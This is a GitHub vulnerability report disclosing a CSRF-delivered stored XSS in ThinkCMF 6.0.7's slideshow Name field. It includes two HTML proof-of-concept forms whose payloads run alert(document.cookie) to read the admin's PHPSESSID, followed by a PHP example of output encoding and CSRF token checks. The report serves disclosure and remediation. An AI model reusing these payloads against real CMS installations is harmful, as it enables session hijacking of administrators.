XSS Stored in the Slideshow Management component. #737

Closed
@AleDiBen

Description

ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field.

Here are the steps to reproduce the issue.

  1. A remote user tricks the logged-in administrator into visiting a malicious site.
  2. The administrator opens the page containing the CSRF payload, injecting the XSS payload into the Slideshow Management (幻灯片管理) page, in the Name (名称) field.
  3. The administrator opens the Slideshow Management (幻灯片管理) page, clicks on Admin Page (管理页面) button and the stored payload is executed.

Note that with this issue a remote user can steal the administrator's session cookie (PHPSESSID).

These are the PoCs I used.

<html>
  <body>
    <h1>CSRF - XSS Stored PoC</h1>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/slide/addPost.html" method="POST">
      <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;0&#41;&gt;" />
      <input type="hidden" name="remark" value="XSS&#32;Stored" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>

<html>
  <body>
    <h1>CSRF - XSS Stored PoC</h1>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/slide/addPost.html" method="POST">
      <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;document.cookie&#41;&gt;" />
      <input type="hidden" name="remark" value="XSS&#32;Stored" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>

Screenshots

Fig. 1 (XSSPayload): CSRF that contains an XSS payload
Fig. 2 (XSSPocExecuted): CSRF payload triggered
Fig. 3 (XSSPayloadInjected): XSS payload injected
Fig. 4 (XSSPayloadExecuted): XSS triggered
Fig. 5 (XSSStoredCookieExfiltration): Reading the PHPSESSID cookie
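The two defects the report chains are a state-changing admin endpoint that accepts a cross-origin form post, and a stored value echoed into the admin page without output encoding. The following plain-PHP example is added here and is not ThinkCMF's code; the function names, the `_token` field and the session token variable are assumptions. It renders the PoC's payload both unescaped and encoded, and shows the token check an `addPost`-style handler needs so that a form submitted from another origin (which cannot read the token) is rejected.

```php
<?php
// Added example, not ThinkCMF code. Function names and the token field are assumptions.

// Encode untrusted text for an HTML element or quoted-attribute context.
// ENT_QUOTES also encodes the single quote, so the value is safe inside attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function encode_for_html(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering: the stored slideshow name is echoed verbatim into the page,
// so the < and > of the payload become real markup and the onerror handler runs.
function render_slide_name_vulnerable(string $name): string {
    return '<td>' . $name . '</td>';
}

// Hardened rendering: the same stored value is encoded at output time,
// so the browser shows the payload as text and executes nothing.
function render_slide_name(string $name): string {
    return '<td>' . encode_for_html($name) . '</td>';
}

// CSRF check for the write endpoint: the submitted token must match the one
// bound to the admin's session. hash_equals() avoids a timing side channel.
// A form posted from an attacker's site cannot include the token, so it fails here.
function csrf_token_is_valid(?string $submitted, ?string $expected): bool {
    return is_string($submitted) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $submitted);
}

// The name value from the second PoC above, after the browser decodes the entities.
$payload = '<audio/src/onerror=alert(document.cookie)>';

echo render_slide_name_vulnerable($payload), "\n"; // markup, handler executes
echo render_slide_name($payload), "\n";            // inert text

// Constructed session token; the PoC form sends no _token, so the check rejects the post.
$sessionToken = bin2hex(random_bytes(32));
$allowed = csrf_token_is_valid($_POST['_token'] ?? null, $sessionToken);
if (!$allowed) {
    echo "addPost rejected: missing or mismatched CSRF token\n";
}
```

Encoding belongs at output time in every template that prints the name; filtering on input alone is not a substitute, because the same value may be rendered in different contexts.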
